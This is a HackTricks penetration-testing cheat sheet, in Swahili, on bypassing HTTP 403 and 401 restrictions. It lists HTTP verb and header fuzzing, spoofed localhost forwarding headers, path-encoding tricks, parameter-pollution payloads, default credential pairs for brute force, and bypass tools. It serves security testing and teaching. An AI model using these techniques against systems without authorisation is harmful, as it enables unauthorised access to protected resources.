HackTricks403 & 401 Bypasses
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HTTP Verbs/Methods Fuzzing
Jaribu kutumia vitenzi tofauti kufikia faili: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
- Angalia vichwa vya majibu, labda taarifa fulani zinaweza kutolewa. Kwa mfano, jibu la 200 kwa HEAD lenye
Content-Length: 55lina maana kwamba kitenzi cha HEAD kinaweza kufikia taarifa. Lakini bado unahitaji kupata njia ya kuhamasisha taarifa hiyo. - Kutumia kichwa cha HTTP kama
X-HTTP-Method-Override: PUTkunaweza kubadilisha kitenzi kilichotumika. - Tumia
TRACEkitenzi na ikiwa una bahati sana labda katika jibu unaweza kuona pia vichwa vilivyoongezwa na proxies za kati ambavyo vinaweza kuwa na manufaa.
HTTP Headers Fuzzing
-
Badilisha kichwa cha Host kuwa thamani yoyote (ambayo ilifanya kazi hapa)
-
Jaribu kutumia Wakala wengine wa Mtumiaji kufikia rasilimali.
-
Fuzz HTTP Headers: Jaribu kutumia HTTP Proxy Headers, HTTP Authentication Basic na NTLM brute-force (kwa mchanganyiko machache tu) na mbinu nyingine. Ili kufanya yote haya nimeunda zana fuzzhttpbypass.
-
X-Originating-IP: 127.0.0.1 -
X-Forwarded-For: 127.0.0.1 -
X-Forwarded: 127.0.0.1 -
Forwarded-For: 127.0.0.1 -
X-Remote-IP: 127.0.0.1 -
X-Remote-Addr: 127.0.0.1 -
X-ProxyUser-Ip: 127.0.0.1 -
X-Original-URL: 127.0.0.1 -
Client-IP: 127.0.0.1 -
True-Client-IP: 127.0.0.1 -
Cluster-Client-IP: 127.0.0.1 -
X-ProxyUser-Ip: 127.0.0.1 -
Host: localhost
Ikiwa njia imekingwa unaweza kujaribu kupita ulinzi wa njia hiyo kwa kutumia vichwa hivi vingine:
-
X-Original-URL: /admin/console -
X-Rewrite-URL: /admin/console -
Ikiwa ukurasa uko nyuma ya proxy, labda ni proxy inayokuzuia kufikia taarifa za kibinafsi. Jaribu kutumia HTTP Request Smuggling au vichwa vya hop-by-hop.
-
Fuzz vichwa maalum vya HTTP ukitafuta majibu tofauti.
-
Fuzz vichwa maalum vya HTTP wakati wa fuzzing HTTP Methods.
-
Ondoa kichwa cha Host na labda utaweza kupita ulinzi.
Path Fuzzing
Ikiwa /path imezuiwa:
- Jaribu kutumia /%2e/path _(ikiwa ufikiaji umezuiwa na proxy, hii inaweza kupita ulinzi). Jaribu pia_** /%252e**/path (kuandika tena URL mara mbili)
- Jaribu Unicode bypass: /%ef%bc%8fpath (Herufi zilizowekwa URL ni kama "/") hivyo wakati zinapandishwa tena itakuwa //path na labda tayari umepita ukaguzi wa jina /path
- Njia nyingine za kupita:
- site.com/secret –> HTTP 403 Forbidden
- site.com/SECRET –> HTTP 200 OK
- site.com/secret/ –> HTTP 200 OK
- site.com/secret/. –> HTTP 200 OK
- site.com//secret// –> HTTP 200 OK
- site.com/./secret/.. –> HTTP 200 OK
- site.com/;/secret –> HTTP 200 OK
- site.com/.;/secret –> HTTP 200 OK
- site.com//;//secret –> HTTP 200 OK
- site.com/secret.json –> HTTP 200 OK (ruby)
- Tumia orodha hii katika hali zifuatazo:
- /FUZZsecret
- /FUZZ/secret
- /secretFUZZ
- Njia nyingine za API:
- /v3/users_data/1234 --> 403 Forbidden
- /v1/users_data/1234 --> 200 OK
- {“id”:111} --> 401 Unauthriozied
- {“id”:[111]} --> 200 OK
- {“id”:111} --> 401 Unauthriozied
- {“id”:{“id”:111}} --> 200 OK
- {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
- user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
Parameter Manipulation
- Badilisha thamani ya param: Kutoka
id=123-->id=124 - Ongeza vigezo vya ziada kwenye URL:
?id=124—->id=124&isAdmin=true - Ondoa vigezo
- Panga upya vigezo
- Tumia herufi maalum.
- Fanya majaribio ya mipaka katika vigezo — toa thamani kama -234 au 0 au 99999999 (thamani chache za mfano).
Protocol version
Ikiwa unatumia HTTP/1.1 jaribu kutumia 1.0 au hata jaribu ikiwa inasaidia 2.0.
Other Bypasses
- Pata IP au CNAME ya domain na jaribu kuwasiliana nayo moja kwa moja.
- Jaribu kushinikiza seva kwa kutuma maombi ya kawaida ya GET (Ilifanya kazi kwa mtu huyu na Facebook).
- Badilisha protokali: kutoka http hadi https, au kutoka https hadi http
- Nenda https://archive.org/web/ na angalia ikiwa katika siku za nyuma faili hiyo ilikuwa inapatikana duniani kote.
Brute Force
- Kisia nenosiri: Jaribu akidi zifuatazo za kawaida. Je, unajua kitu kuhusu mwathirika? Au jina la changamoto ya CTF?
- Brute force: Jaribu msingi, digest na NTLM auth.
admin admin
admin password
admin 1234
admin admin1234
admin 123456
root toor
test test
guest guest
Vifaa vya Otomatiki
- https://github.com/lobuhi/byp4xx
- https://github.com/iamj0ker/bypass-403
- https://github.com/gotr00t0day/forbiddenpass
- Burp Extension - 403 Bypasser
- Forbidden Buster
- NoMoreForbidden
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.